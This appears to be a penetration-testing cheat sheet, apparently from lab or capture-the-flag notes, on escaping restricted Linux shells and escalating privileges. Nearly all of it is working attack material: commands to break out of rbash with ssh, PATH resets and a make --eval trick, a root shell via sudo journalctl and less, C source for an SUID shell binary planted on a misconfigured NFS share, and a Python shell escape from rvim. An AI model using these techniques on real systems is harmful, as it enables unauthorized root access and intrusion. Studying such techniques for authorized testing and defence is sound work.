Jailbreaks

Escape rbash

• It's possible to do it directly connecting with ssh:

ssh -i priv_key drno@10.10.10.124 -t bash

• Or directly changing the PATH:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

---

• Is also possible by using make. First sets a variable COMMAND with the value /bin/bash:

 COMMAND='/bin/bash'

• Then, execute make in silent mode (-s) and evaluates the string x: containing the shell:

make -s --eval=$'x:\n\t-'"$COMMAND"

• Finish it up by fixing the PATH:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

---

sudo journalctl via less

• journalctrl will output to stdout if it can fit onto the current page, but into less if it can’t.

• When invoked with sudo is possible to have code execution as root just by pressing ! in the less environment.

---

Escaping via NFS UID/GID Manipulation

Prerequisites:

1. NFS server must allow arbitrary UID/GID mappings (no_root_squash, no_all_squash, or similar).

2. Access to a writable directory on the NFS share.

3. Ability to execute compiled binaries on the NFS share.

Exploit:

#include <stdlib.h>
#include <unistd.h>

int main() {
    setreuid(1000, 1000);
    setregid(1000, 1000);
    system("/bin/bash");
    return 0;
}

• Compile the exploit:

gcc -static shell.c -o shell

• Now just copy the binary to the NFS share with SUID and SGID permissions:

chmod ug+s /mnt/shell

• Finally just execute it to become the user with 1000 permissions:

Example

/var/nfsshare/shell

• This same technique could be used to escalate privilege to root by using SUID and SGID of 0 if the NFS share is configured with the no_root_squash or no_all_squash options.

---

Escape rvim

• Run rvim:

sudo hijack example

sudo -u adm /usr/bin/rvim /var/www/html/jailuser/dev/jail.c

• And spawn the shell:

:py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")